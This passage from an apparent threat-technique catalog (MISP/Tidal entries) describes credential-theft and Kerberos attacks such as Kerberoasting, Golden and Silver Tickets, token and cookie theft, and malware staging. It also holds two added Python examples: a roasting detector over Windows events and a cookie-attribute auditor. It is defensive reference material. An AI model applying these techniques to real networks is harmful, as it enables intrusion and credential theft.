Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) may increase the chance of users mistakenly executing these files.

The tag is: misp-galaxy:technique="Upload Malware"

Upload Tool

Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242) by placing it on an Internet accessible web server.

Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or was otherwise compromised by them (Compromise Infrastructure).<sup>[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup> Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.<sup>[[Dragos Heroku Watering Hole](https://app.tidalcyber.com/references/8768909c-f511-4067-9a97-6f7dee24f276)]</sup><sup>[[Malwarebytes Heroku Skimmers](https://app.tidalcyber.com/references/4656cc2c-aff3-4416-b18d-995876d37e06)]</sup><sup>[[Intezer App Service Phishing](https://app.tidalcyber.com/references/e86abbd9-f349-4d90-8ec9-899fe1637f94)]</sup>

Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.

The tag is: misp-galaxy:technique="Upload Tool"

Stage Capabilities

Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70)) or obtained ([Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or was otherwise compromised by them ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.<sup>[[Volexity Ocean Lotus November 2020](https://app.tidalcyber.com/references/dbea2493-7e0a-47f0-88c1-5867f8bb1199)]</sup><sup>[[Dragos Heroku Watering Hole](https://app.tidalcyber.com/references/8768909c-f511-4067-9a97-6f7dee24f276)]</sup><sup>[[Malwarebytes Heroku Skimmers](https://app.tidalcyber.com/references/4656cc2c-aff3-4416-b18d-995876d37e06)]</sup><sup>[[Netskope GCP Redirection](https://app.tidalcyber.com/references/18efeffc-c47b-46ad-8e7b-2eda30a406f0)]</sup><sup>[[Netskope Cloud Phishing](https://app.tidalcyber.com/references/25d46bc1-4c05-48d3-95f0-aa3ee1100bf9)]</sup>

Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):

The tag is: misp-galaxy:technique="Stage Capabilities"

Steal Application Access Token

Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.

Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).<sup>[[Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019](https://app.tidalcyber.com/references/8ec52402-7e54-463d-8906-f373e5855018)]</sup> OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.

In Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container’s token and thereby gain access to Kubernetes API commands.<sup>[[Kubernetes Service Accounts](https://app.tidalcyber.com/references/a74ffa28-8a2e-4bfd-bc66-969b463bebd9)]</sup>

Token theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft’s Authorization Code Grant flow.<sup>[[Microsoft Identity Platform Protocols May 2019](https://app.tidalcyber.com/references/a99d2292-be39-4e55-a952-30c9d6a3d0a3)]</sup><sup>[[Microsoft - OAuth Code Authorization flow - June 2019](https://app.tidalcyber.com/references/a41c2123-8b8d-4f98-a535-e58e3e746b69)]</sup> An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.

Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user’s OAuth token.<sup>[[Amnesty OAuth Phishing Attacks, August 2019](https://app.tidalcyber.com/references/0b0f9cf6-f0af-4f86-9699-a63ff36c49e2)]</sup><sup>[[Trend Micro Pawn Storm OAuth 2017](https://app.tidalcyber.com/references/7d12c764-facd-4086-acd0-5c0287344520)]</sup> The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.<sup>[[Microsoft - Azure AD App Registration - May 2019](https://app.tidalcyber.com/references/36a06c99-55ca-4163-9450-c3b84ae10039)]</sup> Then, they can send a [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through Application Access Token.<sup>[[Microsoft - Azure AD Identity Tokens - Aug 2019](https://app.tidalcyber.com/references/44767d53-8cd7-44dd-a69d-8a7bebc1d87d)]</sup>

Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens<sup>[[Auth0 Understanding Refresh Tokens](https://app.tidalcyber.com/references/84eb3d8a-f6b1-4bb5-9411-2c8da29b5946)]</sup>, allowing them to obtain new access tokens without prompting the user.

The tag is: misp-galaxy:technique="Steal Application Access Token"

Steal or Forge Authentication Certificates

Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.<sup>[[O365 Blog Azure AD Device IDs](https://app.tidalcyber.com/references/ec94c043-92ef-4691-b21a-7ea68f39e338)]</sup><sup>[[Microsoft AD CS Overview](https://app.tidalcyber.com/references/f1b2526a-1bf6-4954-a9b3-a5e008761ceb)]</sup>

Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)<sup>[[APT29 Deep Look at Credential Roaming](https://app.tidalcyber.com/references/691fb596-07b6-5c13-9cec-e28530ffde12)]</sup>, misplaced certificate files (i.e. [Unsecured Credentials](https://app.tidalcyber.com/technique/02ed857b-ba39-4fab-b1d9-3ed2aa689dfd)), or directly from the Windows certificate store via various crypto APIs.<sup>[[SpecterOps Certified Pre Owned](https://app.tidalcyber.com/references/73b6a6a6-c2b8-4aed-9cbc-d3bdcbb97698)]</sup><sup>[[GitHub CertStealer](https://app.tidalcyber.com/references/da06ce8f-f950-4ae8-a62a-b59b236e91a3)]</sup><sup>[[GitHub GhostPack Certificates](https://app.tidalcyber.com/references/941e214d-4188-4ca0-9ef8-b26aa96373a2)]</sup> With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.<sup>[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)]</sup>

Abusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) via stealing or forging certificates that can be used as [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) for the duration of the certificate’s validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.

Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).<sup>[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)]</sup> Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://app.tidalcyber.com/technique/12efebf8-9da4-446c-a627-b6f95524f1ea) ticket-granting tickets (TGT) or NTLM plaintext.<sup>[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)]</sup>

The tag is: misp-galaxy:technique="Steal or Forge Authentication Certificates"

AS-REP Roasting

Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://app.tidalcyber.com/technique/7e8c3c70-2e9f-4fa0-b083-ff5610447dc1) Kerberos messages.<sup>[[Harmj0y Roasting AS-REPs Jan 2017](https://app.tidalcyber.com/references/bfb01fbf-4dc0-4943-8a21-457f28f4b01f)]</sup>

Preauthentication offers protection against offline [Password Cracking](https://app.tidalcyber.com/technique/7e8c3c70-2e9f-4fa0-b083-ff5610447dc1). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.<sup>[[Microsoft Kerberos Preauth 2014](https://app.tidalcyber.com/references/328953ed-93c7-46c0-9a05-53dc44d294fe)]</sup>

For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://app.tidalcyber.com/technique/7e8c3c70-2e9f-4fa0-b083-ff5610447dc1) attacks similarly to [Kerberoasting](https://app.tidalcyber.com/technique/2f980aed-b34a-4300-ac6b-70e7ddf6d9be) and expose plaintext credentials. <sup>[[Harmj0y Roasting AS-REPs Jan 2017](https://app.tidalcyber.com/references/bfb01fbf-4dc0-4943-8a21-457f28f4b01f)]</sup><sup>[[Stealthbits Cracking AS-REP Roasting Jun 2019](https://app.tidalcyber.com/references/3af06034-8384-4de8-9356-e9aaa35b95a2)]</sup>

An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. <sup>[[Harmj0y Roasting AS-REPs Jan 2017](https://app.tidalcyber.com/references/bfb01fbf-4dc0-4943-8a21-457f28f4b01f)]</sup><sup>[[Stealthbits Cracking AS-REP Roasting Jun 2019](https://app.tidalcyber.com/references/3af06034-8384-4de8-9356-e9aaa35b95a2)]</sup>

The tag is: misp-galaxy:technique="AS-REP Roasting"

Golden Ticket

Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.<sup>[[AdSecurity Kerberos GT Aug 2015](https://app.tidalcyber.com/references/aac51d49-9a72-4456-8539-8a5f5d0ef7d7)]</sup> Golden tickets enable adversaries to generate authentication material for any account in Active Directory.<sup>[[CERT-EU Golden Ticket Protection](https://app.tidalcyber.com/references/268f9cfa-71f4-4cb1-96f3-c61e71892d30)]</sup>

Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.<sup>[[ADSecurity Detecting Forged Tickets](https://app.tidalcyber.com/references/4c328a1a-6a83-4399-86c5-d6e1586da8a3)]</sup>

The KDC service runs on all domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.<sup>[[ADSecurity Kerberos and KRBTGT](https://app.tidalcyber.com/references/6e61f3e1-35e6-44f4-9bc4-60b2bcb71b15)]</sup> The KRBTGT password hash may be obtained using [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) and privileged access to a domain controller.

The tag is: misp-galaxy:technique="Golden Ticket"

Kerberoasting

Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c).<sup>[[Empire InvokeKerberoast Oct 2016](https://app.tidalcyber.com/references/a358bf8f-166e-4726-adfd-415e953d4ffe)]</sup><sup>[[AdSecurity Cracking Kerberos Dec 2015](https://app.tidalcyber.com/references/1b018fc3-515a-4ec4-978f-6d5649ceb0c5)]</sup>

Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service<sup>[[Microsoft Detecting Kerberoasting Feb 2018](https://app.tidalcyber.com/references/b36d82a8-82ca-4f22-85c0-ee82be3b6940)]</sup>).<sup>[[Microsoft SPN](https://app.tidalcyber.com/references/985ad31b-c385-473d-978d-40b6cd85268a)]</sup><sup>[[Microsoft SetSPN](https://app.tidalcyber.com/references/dd5dc432-32de-4bf3-b2c7-0bbdda031dd0)]</sup><sup>[[SANS Attacking Kerberos Nov 2014](https://app.tidalcyber.com/references/f20d6bd0-d699-4ee4-8ef6-3c45ec12cd42)]</sup><sup>[[Harmj0y Kerberoast Nov 2016](https://app.tidalcyber.com/references/6f1f8bc3-421e-46ff-88e3-48fcc6f7b76a)]</sup>

Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).<sup>[[Empire InvokeKerberoast Oct 2016](https://app.tidalcyber.com/references/a358bf8f-166e-4726-adfd-415e953d4ffe)]</sup><sup>[[AdSecurity Cracking Kerberos Dec 2015](https://app.tidalcyber.com/references/1b018fc3-515a-4ec4-978f-6d5649ceb0c5)]</sup> Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) attacks that may expose plaintext credentials.<sup>[[AdSecurity Cracking Kerberos Dec 2015](https://app.tidalcyber.com/references/1b018fc3-515a-4ec4-978f-6d5649ceb0c5)]</sup><sup>[[Empire InvokeKerberoast Oct 2016](https://app.tidalcyber.com/references/a358bf8f-166e-4726-adfd-415e953d4ffe)]</sup> <sup>[[Harmj0y Kerberoast Nov 2016](https://app.tidalcyber.com/references/6f1f8bc3-421e-46ff-88e3-48fcc6f7b76a)]</sup>

This same behavior could be executed using service tickets captured from network traffic.<sup>[[AdSecurity Cracking Kerberos Dec 2015](https://app.tidalcyber.com/references/1b018fc3-515a-4ec4-978f-6d5649ceb0c5)]</sup>
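The AS-REP Roasting and Kerberoasting descriptions above both come down to one observable on the domain controller: ticket requests whose encrypted portion uses a key derived from a user account's password (RC4, etype 0x17) and, for AS-REP roasting, a TGT request made without pre-authentication. The following Python is an added detection example, not code from the page or from MISP; `SAMPLE_EVENTS`, its field names and every account, SPN and address in it are constructed, and the thresholds (three distinct SPNs inside five minutes) are assumptions a defender would tune to their own environment. It runs over simplified records of Windows Security events 4768 (TGT requested) and 4769 (service ticket requested).

```python
"""Detection logic for AS-REP roasting (4768 without pre-authentication) and
Kerberoasting (4769 service-ticket requests with the RC4 etype) over a
constructed sample of Windows Security events. Added example, not page code."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # Kerberos etype 23: the cipher whose TGS-REP/AS-REP blobs crack offline

# Constructed sample. Field names are shortened forms of the Security log fields
# (TargetUserName, ServiceName, TicketEncryptionType, PreAuthType, IpAddress).
SAMPLE_EVENTS = [
    {"id": 4769, "time": "2024-01-10T09:00:00", "account": "WS01$", "service": "FS01$", "etype": "0x12", "ip": "10.0.0.21"},
    {"id": 4769, "time": "2024-01-10T09:01:00", "account": "jdoe", "service": "svc_sql", "etype": RC4_HMAC, "ip": "10.0.0.50"},
    {"id": 4769, "time": "2024-01-10T09:01:02", "account": "jdoe", "service": "svc_web", "etype": RC4_HMAC, "ip": "10.0.0.50"},
    {"id": 4769, "time": "2024-01-10T09:01:03", "account": "jdoe", "service": "svc_backup", "etype": RC4_HMAC, "ip": "10.0.0.50"},
    {"id": 4769, "time": "2024-01-10T09:01:05", "account": "jdoe", "service": "krbtgt", "etype": RC4_HMAC, "ip": "10.0.0.50"},
    {"id": 4769, "time": "2024-01-10T09:30:00", "account": "asmith", "service": "svc_sql", "etype": "0x12", "ip": "10.0.0.60"},
    {"id": 4768, "time": "2024-01-10T09:02:00", "account": "legacyapp", "preauth": "0", "etype": RC4_HMAC, "ip": "10.0.0.50"},
    {"id": 4768, "time": "2024-01-10T09:02:01", "account": "printsvc", "preauth": "0", "etype": RC4_HMAC, "ip": "10.0.0.50"},
    {"id": 4768, "time": "2024-01-10T09:05:00", "account": "asmith", "preauth": "2", "etype": "0x12", "ip": "10.0.0.60"},
]


def _parse_time(ts):
    return datetime.fromisoformat(ts)


def is_roastable_service(name):
    """Machine accounts ($) and krbtgt are excluded: their keys derive from long
    random passwords, so an RC4 ticket for them is not a practical cracking target."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def kerberoast_candidates(events, min_spns=3, window=timedelta(minutes=5)):
    """Group RC4 (etype 0x17) 4769 requests for user-account SPNs by requesting
    account and source IP; return {(account, ip): [services]} for requesters that
    asked for at least min_spns distinct services inside the window."""
    by_requester = defaultdict(list)
    for ev in events:
        if ev["id"] != 4769 or ev["etype"] != RC4_HMAC:
            continue
        if not is_roastable_service(ev["service"]):
            continue
        by_requester[(ev["account"], ev["ip"])].append((_parse_time(ev["time"]), ev["service"]))
    findings = {}
    for key, reqs in by_requester.items():
        reqs.sort()
        for start, _ in reqs:  # sliding window anchored on each request in turn
            services = {svc for t, svc in reqs if start <= t <= start + window}
            if len(services) >= min_spns:
                findings[key] = sorted(services)
                break
    return findings


def asrep_roast_candidates(events):
    """Return {source_ip: [accounts]} for 4768 events with Pre-Authentication Type 0.
    The AS-REP for such an account carries data encrypted under the user's key,
    which is what an AS-REP roaster collects; one source requesting TGTs for
    several pre-auth-disabled accounts is the pattern to alert on."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["id"] == 4768 and ev.get("preauth") == "0":
            by_ip[ev["ip"]].append(ev["account"])
    return dict(by_ip)


if __name__ == "__main__":
    print("Kerberoasting:", kerberoast_candidates(SAMPLE_EVENTS))
    print("AS-REP roasting:", asrep_roast_candidates(SAMPLE_EVENTS))
```

On real data the same two functions apply after mapping the XML event fields onto the record keys used here; the RC4 filter is what keeps the volume manageable, since AES service-ticket requests are the normal case on a domain where RC4 has been retired.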

The tag is: misp-galaxy:technique="Kerberoasting"

Silver Ticket

Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.<sup>[[ADSecurity Silver Tickets](https://app.tidalcyber.com/references/5185560e-b8f0-4c40-8c90-cb12348a0f7f)]</sup>

Silver tickets are more limited in scope than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.<sup>[[ADSecurity Detecting Forged Tickets](https://app.tidalcyber.com/references/4c328a1a-6a83-4399-86c5-d6e1586da8a3)]</sup>

Password hashes for target services may be obtained using [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) or [Kerberoasting](https://app.tidalcyber.com/technique/2f980aed-b34a-4300-ac6b-70e7ddf6d9be).

The tag is: misp-galaxy:technique="Silver Ticket"

Steal or Forge Kerberos Tickets

Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).<sup>[[ADSecurity Kerberos Ring Decoder](https://app.tidalcyber.com/references/5f78a554-2d5c-49af-8c6c-6e10f9aec997)]</sup> Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.

On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.<sup>[[Microsoft Klist](https://app.tidalcyber.com/references/f500340f-23fc-406a-97ef-0de787ef8cec)]</sup>

Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user’s session lasts.<sup>[[MIT ccache](https://app.tidalcyber.com/references/6a1b4373-2304-420c-8733-e1eae71ff7b2)]</sup> On modern Red Hat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default, SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a). The ccache file may also be converted into a Windows format using tools such as Kekeo.<sup>[[Linux Kerberos Tickets](https://app.tidalcyber.com/references/5aea042f-4eb1-4092-89be-3db695053470)]</sup><sup>[[Brining MimiKatz to Unix](https://app.tidalcyber.com/references/5ad06565-6694-4c42-81c9-880d66f6d07f)]</sup><sup>[[Kekeo](https://app.tidalcyber.com/references/0b69f0f5-dd4a-4926-9369-8253a0c3ddea)]</sup>

Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller’s environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple’s native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user’s TGT or Service Tickets.<sup>[[SpectorOps Bifrost Kerberos macOS 2019](https://app.tidalcyber.com/references/58ecb4e9-25fc-487b-9fed-25c781cc531b)]</sup><sup>[[macOS kerberos framework MIT](https://app.tidalcyber.com/references/8e09346b-03ce-4627-a365-f2f63089d1e0)]</sup>

The tag is: misp-galaxy:technique="Steal or Forge Kerberos Tickets"

Steal Web Session Cookie

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.

Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the target's machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypass some multi-factor authentication protocols.<sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup>

There are several examples of malware targeting cookies from web browsers on the local system.<sup>[[Kaspersky TajMahal April 2019](https://app.tidalcyber.com/references/1ed20522-52ae-4d0c-b42e-c680490958ac)]</sup><sup>[[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]</sup> There are also open source frameworks such as Evilginx2 and Muraena that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9)) that can be set up by an adversary and used in phishing campaigns.<sup>[[Github evilginx2](https://app.tidalcyber.com/references/322e5d90-5095-47ea-b0e2-e7e5fb45fcca)]</sup><sup>[[GitHub Mauraena](https://app.tidalcyber.com/references/578ecf62-b546-4f52-9d50-92557edf2dd4)]</sup>

After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://app.tidalcyber.com/technique/d36a5323-e249-44e8-9c8b-5cc9c023a5e1) technique to log in to the corresponding web application.
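Each exposure named above (plaintext traffic, script access, on-disk storage, long validity) corresponds to a Set-Cookie attribute the issuing application controls, so the cheapest mitigation review is an audit of the headers the application actually sends. The following Python is an added example, not code from the page or from MISP: `SAMPLE_SET_COOKIE_HEADERS`, the cookie names in it and the 12-hour lifetime ceiling are constructed assumptions; the attribute semantics (Secure, HttpOnly, SameSite, Max-Age/Expires) are those of the HTTP cookie specification.

```python
"""Audit Set-Cookie headers for the attributes that limit what a stolen session
cookie is worth. Added example over constructed headers, not page code."""
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime

# Constructed sample responses from a hypothetical web application.
SAMPLE_SET_COOKIE_HEADERS = [
    "sessionid=c0ffee; Path=/; Secure; HttpOnly; SameSite=Lax",          # memory-only session cookie
    "auth_token=deadbeef; Path=/; Max-Age=2592000",                       # 30-day persistent token, no flags
    "sso=cafe; Path=/; Secure; HttpOnly; SameSite=None; Max-Age=3600",    # cross-site use, one hour
]


def parse_set_cookie(header):
    """Split 'name=value; Attr; Attr=val' into (name, value, {attr_lower: val})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def cookie_lifetime(attrs, now=None):
    """Lifetime from Max-Age (takes precedence) or Expires; None for a session cookie,
    which the browser keeps in memory and discards when it closes."""
    if "max-age" in attrs:
        try:
            return timedelta(seconds=int(attrs["max-age"]))
        except ValueError:
            return None
    if "expires" in attrs:
        try:
            expires = parsedate_to_datetime(attrs["expires"])
        except (TypeError, ValueError):
            return None
        if expires.tzinfo is None:
            expires = expires.replace(tzinfo=timezone.utc)
        return expires - (now or datetime.now(timezone.utc))
    return None


def audit_set_cookie(header, max_lifetime=timedelta(hours=12), now=None):
    """Return (cookie_name, [issues]); each issue names the exposure it maps to.
    max_lifetime is an assumed policy ceiling for an authentication cookie."""
    name, _, attrs = parse_set_cookie(header)
    issues = []
    if "secure" not in attrs:
        issues.append("no Secure attribute: cookie is sent over plaintext HTTP (network traffic)")
    if "httponly" not in attrs:
        issues.append("no HttpOnly attribute: readable by script running in the page")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        issues.append("SameSite not Lax/Strict: attached to cross-site requests")
    lifetime = cookie_lifetime(attrs, now)
    if lifetime is not None:
        issues.append("persistent cookie (Max-Age/Expires): written to the browser's on-disk cookie store")
        if lifetime > max_lifetime:
            issues.append(f"lifetime {lifetime} exceeds policy ceiling {max_lifetime}")
    return name, issues


def audit_all(headers, **kwargs):
    """Audit a list of Set-Cookie headers into {cookie_name: [issues]}."""
    return dict(audit_set_cookie(h, **kwargs) for h in headers)


if __name__ == "__main__":
    for cookie, issues in audit_all(SAMPLE_SET_COOKIE_HEADERS).items():
        print(cookie, "->", issues or "ok")
```

The `sso` cookie shows why the output is a list of findings rather than a verdict: `SameSite=None` is required for legitimate cross-site single sign-on, so that line is a design question for the application owner, while the missing flags on `auth_token` are plain defects.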

The tag is: misp-galaxy:technique="Steal Web Session Cookie"

Code Signing

Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. <sup>[[Wikipedia Code Signing](https://app.tidalcyber.com/references/363e860d-e14c-4fcd-985f-f76353018908)]</sup> The certificates used during an operation may be created, acquired, or stolen by the adversary. <sup>[[Securelist Digital Certificates](https://app.tidalcyber.com/references/3568163b-24b8-42fd-b111-b9d83c34cc4f)]</sup> <sup>[[Symantec Digital Certificates](https://app.tidalcyber.com/references/4b4f0171-827d-45c3-8c89-66ea801e77e8)]</sup> Unlike [Invalid Code Signature](https://app.tidalcyber.com/technique/aa5a31d0-1b78-481d-a317-5089c1e111bf), this activity will result in a valid signature.

